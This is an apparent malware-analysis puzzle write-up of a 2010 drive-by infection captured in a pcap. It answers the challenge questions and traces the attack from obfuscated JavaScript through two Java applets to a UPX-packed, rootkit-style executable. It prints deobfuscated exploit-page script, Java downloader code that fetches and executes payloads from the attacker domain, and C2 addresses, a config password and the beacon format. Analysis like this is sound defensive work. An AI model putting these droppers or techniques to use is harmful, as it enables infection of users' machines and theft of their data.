Name: yulyul2003 Description: Contents: 1. Answers 2. Short description of the infection flow 3. Extracting files 4. Details 4.a. File xxx.xxx 4.b. File true.php 4.c. File q.jar 4.d. File sdfg.jar 4.e. File file.exe - Short analysis of the malware 5. Simple manual disinfection ====================================================================== 1. Answers: ====================================================================== 1. As part of the infection process, Ms. Moneymany’s browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets? q.jar sdfg.jar 2. What was Ms. Moneymany’s username on the infected Windows system? ADMINISTRATOR 3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click? http://nrtjo.eu/true.php 4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? Hint: It ends on -Y΄91ed‘. 5942BA36CF732097479C51986EEE91ED 5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in ΄mainstream‘ malware. UPX 6. What is the MD5 hash of the unpacked version of the malicious Windows executable file? 0F37839F48F7FC77E6D50E14657FB96E 7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host? 213.155.29.144 ====================================================================== 2. Short description of the infection flow: ====================================================================== The victim clicks: http://nrtjo.eu/true.php (that contains xxx.xxx js), which downloads and instantiates 2 java applets: q.jar and sdfg.jar. Each jar file can download from the server and executes the malware. Once the malware is executed it copy itself in "C:\cleansweep.exe\" directory and extract a file from resource called config.bin which contains control servers address. It hides itself hooking NtQueryDirectoryFile and NtEnumerateValueKey. It sends information via http using the URL string regarding connection status, user name, computer name, malware version and md5, etc.. PS: Looks like online status is check by connecting on 213.155.29.144 and port 444. This connection is also used to send user information. ====================================================================== 3. Extracting files ====================================================================== I used xplico (http://www.xplico.org/) cool tool to extract the files from the infected.pcap. ====================================================================== 4. Details ====================================================================== ======================================== 4.a. File xxx.xxx ======================================== function ararata(reem,aanpry) { f2112=this; var xxy= f2112['eDv5aDlF'.replace(/[F15D\:]/g, '')]; return xxy('r'+'e'+'e'+'m.r'+'ep'+'lace('+'/r00ts/g'+',aanpry)'); } 'eDv5aDlF'.replace(/[F15D\:]/g, '') = eval 'r'+'e'+'e'+'m.r'+'ep'+'lace('+'/r00ts/g'+',aanpry)' = reem.replace(/r00ts/g,aanpry) Resulting function: ----------------------------------------- function ararata(reem,aanpry) { reem.replace(/r00ts/g,aanpry) } ======================================== 4.b. File true.php ======================================== var QYDCtrO3jhsZAwQE=f555['eDv5aDlF'.replace(/[F15D\:]/g, '')]; 'eDv5aDlF'.replace(/[F15D\:]/g, '') = eval QYDCtrO3jhsZAwQE = eval var FMsXHWkm3otEzXWe=f777['unDe:s5c:aDp:eF'.replace(/[F15D\:]/g, '')]; 'unDe:s5c:aDp:eF'.replace(/[F15D\:]/g, '' = unescape FMsXHWkm3otEzXWe = unescape Replacing functions: QYDCtrO3jhsZAwQE('v'+'a'+'r ag'+'la'+'va'+'nd = ara'+'ra'+'ta(b'+'bs'+'a,Vs'+'SdAy); ag'+'lava'+'nd = FMsXHWkm3otEzXWe(ag'+'la'+'v'+'an'+'d);'); QYDCtrO3jhsZAwQE('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+FMsXHWkm3otEzXWe('%65%6e%74')); pwdzraa.write('<'+'s'+FMsXHWkm3otEzXWe('%63%72%69%70%74%3e')); pwdzraa.write('v'+'ar kkrzbF2Lwtu8qLL0 = FMsXHWkm3otEzXWe(ag'+'la'+'va'+'nd);QYDCtrO3jhsZAwQE('+'kkrzbF2Lwtu8qLL0);'); Result: eval('v'+'a'+'r ag'+'la'+'va'+'nd = ara'+'ra'+'ta(b'+'bs'+'a,Vs'+'SdAy); ag'+'lava'+'nd = unescape(ag'+'la'+'v'+'an'+'d);'); eval('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+unescape('%65%6e%74')); pwdzraa.write('<'+'s'+unescape('%63%72%69%70%74%3e')); pwdzraa.write('v'+'ar kkrzbF2Lwtu8qLL0 = unescape(ag'+'la'+'va'+'nd);eval('+'kkrzbF2Lwtu8qLL0);'); unescape('%65%6e%74') = ent unescape('%63%72%69%70%74%3e') = cript> concat and unescape: eval('var aglavand = ararata(bbsa,VsSdAy); aglavand = unescape(aglavand);'); eval('var pwdzraa = document); pwdzraa.write(''); Refactoring var aglavand = ararata(bbsa,VsSdAy); aglavand = unescape(aglavand); document.write(''); Result ---------------- =====>>> kkrzbF2Lwtu8qLL0 = unescape('%0A%20%20document.write%28%22%3COBJECT%20id%3Djdf1%20height%3D0%20width%3D0%20classid%3Dclsid%3ACA8A9780-280D-11CF-A24D-444553540000%3E%3C%2FOBJECT%3E%22%29%3B%0A%20%20%20%20var%20ver%20%3D%20jdf1. GetVersions%28%29%3B%0A%20%20%20%20ver%20%3D%20ver.split%28%22%2C%22%29%3B%0A%09ver%20%3D%20ver%5B1%5D.split%28%22%3D%22%29%3B%0A%09ver%20%3D%20ver%5B1%5D%3B%0A%09if%20%28%28ver%20%3C%20%227.1.4%22%29%20%7C% 7C%20%28ver%20%3C%20%228.1.7%22%29%20%7C%7C%20%28ver%20%3C%20%229.3%22%29%29%0A%09%7B%0A%09%09%20document.write%28%27%3Ciframe%20src%3D%22http%3A%2F%2Fnrtjo.eu%2F%2Fpdf.php%3Fspl%3Die%22%20width%3D%22173%22% 20height%3D%22348%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E%27%29%3B%0A%09%7D%20%20%0A%20%20%20%20%09%0A') =====>>>> kkrzbF2Lwtu8qLL0 = document.write(""); var ver = jdf1.GetVersions(); ver = ver.split(","); ver = ver[1].split("="); ver = ver[1]; if ((ver < "7.1.4") || (ver < "8.1.7") || (ver < "9.3")) { document.write(''); } ==========>>>>>>>> CA8A9780-280D-11CF-A24D-444553540000 = acrobat reader So the first way to exploit (install the malware) is via PDF infection, but in this case the version of the acrobat reader was not good. After refactoring the true.php looks like this: So, there are 3 types of infections: 1. via Acrobat Reader - not in this case because Acrobat Reader version (if ((ver < "7.1.4") || (ver < "8.1.7") || (ver < "9.3"))) or maybe Acrobat reader plug-in was not installed. 2. via sdfg.jar 3. via q.jar Let's analyze each file: ======================================== 4.c. File q.jar ======================================== This jar is loaded by the following script from true.php - It contains 2 classes: - AppletPanel.class - Main.class - Next step is to decompile the classes with jad - Source code is obfuscated; - After refactoring the code a little bit we obtain a class AppletViewer that contains the actual downloading and service registering code - AppletViewer is created and instantiated using method defineClass(String name, byte[] b, int off, int len, ProtectionDomain protectionDomain) from class Class. - The bytes that make up the class data are converted using some string replacement and byte manipulation. Here is the function: public static byte[] PadSG6F(String s) { String s1 = s.replaceAll("h", ""); byte abyte0[] = new byte[s1.length() / 2]; for(int i = 0; i < s1.length(); i += 2) abyte0[i / 2] = (byte)((Character.digit(s1.charAt(i), 16) << 4) + Character.digit(s1.charAt(i + 1), 16)); return abyte0; } - Here is a snippet that sets the AppletViewer properties: String s4 = "u"; String s5 = "c"; String s6 = "d"; Field field = class1.getField(s4); Field field1 = class1.getField(s5); Field field2 = class1.getField(s6); Object obj1 = class1.newInstance(); field.set(obj1, s); field1.set(obj1, s1); field2.set(obj1, s2); obj1 = class1.newInstance(); where: s : http://nrtjo.eu//loading.php?spl=javadnw& s1 : 1 s2 : 1 - After saving the class array to a file called AppletViewer.class and decompile the class with jad we obtain the download code. - The AppletViewer appends the java version to the url. The version format is created by parseVersion(String s, int i) method. - In my case the url is http://nrtjo.eu//loading.php?spl=javadnw&J120006010 - In the infected.pcap case the download url is: http://nrtjo.eu//loading.php?spl=javadnw&J050006010 - The url is not available anymore. - The stream is saved in a temporary file. The extension is created as follows: if(j != 0) s2 = s2 + ".dl"; else s2 = s2 + ".ex"; where j = 1 - The service is registered using: s3 = "regsvr32 -s \"" + fileName + "\""; Runtime.getRuntime().exec(s3); - That's all for the q.jar file ======================================== 4.d. File sdfg.jar ======================================== This jar is loaded by the following script from true.php We see from the above script the applet from myf.y.AppletX class The myf/y directory has 3 classes PX.class AppletX.class LoaderX.class After decompilation of myf/y directory we see that AppletX class is used for instantiating the loaderX class. next the bootstrapPayload(s5, s6) method is called from the LoaderX instance: String s5 = getParameter("data"); String s6 = getParameter("cc"); if(s5 == null) s5 = ""; LoaderX.instance.bootstrapPayload(s5, s6); where data = "http://nrtjo.eu//loading.php?spl=javad"; cc = "1"; In LoaderX class use the same method as q.jar to create the myf.y.PX class using defineClass method, but this time the class is embedded in the jar file directly. Next the data and cc fields are set using reflection. On run the PX class creates the URL: http://nrtjo.eu//loading.php?spl=javad0 Download the file to the temp directory created with: String s6 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString(); And then executes the file using: Runtime.getRuntime().exec(s6); That's all for the sdfg.jar file. That's easy. ======================================== 4.e. File file.exe - Short analysis of the malware ======================================== First of all let's open the file in a Hex Editor. You can easily see the sections .UPX0, .UPX1, so the file is packed with UPX. Next thing to do is to unpack the file using UPX: upx -d file.exe File size Ratio Format Name -------------------- ------ ----------- ----------- 82432 <- 68096 82.61% win32/pe file.exe Packed file MD5: 5942BA36CF732097479C51986EEE91ED Unpacked file MD5: 0F37839F48F7FC77E6D50E14657FB96E In the unpacked file we can also see that there is another section named .rsrc (resources). We can extract this resource using Resource Hacker. Seems to be some kind of packed file. We will see later after header modification that is a zip file with password. I'm using IDA to disassemble the malware. Most of the dll are loaded dynamically using hardcoded mov instructions like this: loc_4034CF: ; jumptable 00402F18 case 11 mov [ebp+var_338], 'u' mov [ebp+var_336], 'r' mov [ebp+var_334], 'l' mov [ebp+var_332], 'm' mov [ebp+var_330], 'o' mov [ebp+var_32E], 'n' mov [ebp+var_32C], '.' mov [ebp+var_32A], 'd' mov [ebp+var_328], 'l' mov [ebp+var_326], 'l' and [ebp+var_324], 0 lea eax, [ebp+var_338] push eax ; Source lea eax, [ebp+Dest] push eax ; Dest call wcscpy pop ecx pop ecx jmp loc_4035CB Other dll imported: urlmon.dll ws2_32.dll ntdll.dll shell32.dll etc. For ring0 instructions function LdrLoadDll is used. Basically the execution of a function looks like this: kernel32_IsWow64Process (to get dll path) ntdll_NtOpenFile ( open the dll) ntdll_NtQueryInformationFile ntdll_NtCreateSection EXECUTE Metod from DLL (for each function is a hardcoded way to call it. Almost every function has a wrapper to call it.) ntdll_NtUnmapViewOfSection ntdll_NtClose (release file) The malware hooks some important functions to hide itself 1. NtQueryDirectoryFile - to hide its directory ("C:\cleansweep.exe\") and files (cleansweep.exe, config.bin) 2. NtEnumerateValueKey - to hide its autorun registry key: Location: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Keyname: cleansweep.exe Value: C:\cleansweep.exe\cleansweep.exe Other hooks are: 1. TranslateMessage 2. NtVdmControl 3. LdrLoadDll 4. InternetCloseHandle 5. KiFastSystemCall The malware inject itself to System and svchost.exe processes to remain resident. The process that started the infection closes. The directory "C:\cleansweep.exe\" contains two files: 1. cleansweep.exe - The malware 2. config.bin - the configuration file that contains the urls to its Command Server and other configuration options like check interval. The config.bin file it’s a modified zip file with password. If we change the first to bytes with PK then it’s a valid zip file. The password for zip file is in the malware exe file: E1DD562C92E0EBBEC606170E64B39DC4 loc_4021E6: push 20h push offset aE1dd562c92e0eb ; "E1DD562C92E0EBBEC606170E64B39DC4" lea eax, [esi+edi] push eax call sub_401708 The config.bin archive contains on file named config.dat. The file.dat contains the following links: http://freeways.in/11111/gate.php http://213.155.29.144/software/_statistiko/gate.php 213.155.29.144:444 On my analysis date (12.05.2010) the "freeways.in" (ip: 212.252.32.20) domain is unreachable (by 93.186.112.22). Those are the links that are used to send user information. The url is contains the following infos guid=UserName!MachineName! ver=MallwareVersion stat=IsOnline cpu=CpuType ccrc= CustomCrc md5=UnpackedVersionMd5 ie=Internet explorer version os= Windows version In the infected.pcap it was: gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed HTTP/1.1\r\n In my case was: gate.php?guid=ADMINISTRATOR!xxxxx!B8CXXX99&ver=10084&stat=ONLINE&cpu=9&ccrc=5A4F4DF7&md5=0f37839f48f7fc77e6d50e14657fb96e More could be said about the malicious executable, but maybe this will be the task of another puzzle. ======================================== 5. Simple manual disinfection ======================================== Use a tool like IceSword (http://www.antirootkit.com/software/IceSword.htm) to edit the registry key "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cleansweep.exe" Press reset button. :) Delete "C:\cleansweep.exe\" directory. Delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cleansweep.exe" registry key. This is the first time I'm writing about my analysis of malwares, so sorry for the few words. That's all folks!